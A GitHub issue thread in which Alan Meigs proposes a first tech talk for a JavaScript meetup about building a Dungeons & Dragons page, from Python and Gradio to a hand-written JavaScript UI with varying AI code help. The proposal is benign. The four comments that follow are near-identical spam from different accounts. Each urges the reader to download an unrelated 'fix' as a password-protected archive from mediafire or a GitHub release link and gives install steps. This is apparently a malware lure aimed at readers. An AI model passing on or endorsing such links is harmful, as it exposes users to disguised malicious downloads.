### ISSUE TITLE
Talk: Dungeons & Dragons & AI : From 'Hello World' to a Publish Ready Page 

### ISSUE THREAD

**Issue by Drakosfire** [boulder-js/talks#2]
### Abstract

I have gone from never writing a line of code, to using python and the Gradio UI builder, to building my own UI in JavaScript from scratch. With varying levels of GenAI code support along the way. I will start with showing my JavaScript built UI, then showing the path and choices I made along the way, the lessons learned about how much support to allow AI to provide and when to buckle down and read the docs. 

### Your name (and pronouns)
Alan Meigs He/Him/His

- [x] This will be my first tech talk

### Contact Details

Alan Meigs

### Location & Time frame

I can do this in 10 or take as much time as available. 
### Code of Conduct

- [x] I've read and agree to the [Code of Conduct](https://github.com/boulder-js/.github/blob/main/CODE_OF_CONDUCT.md)

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
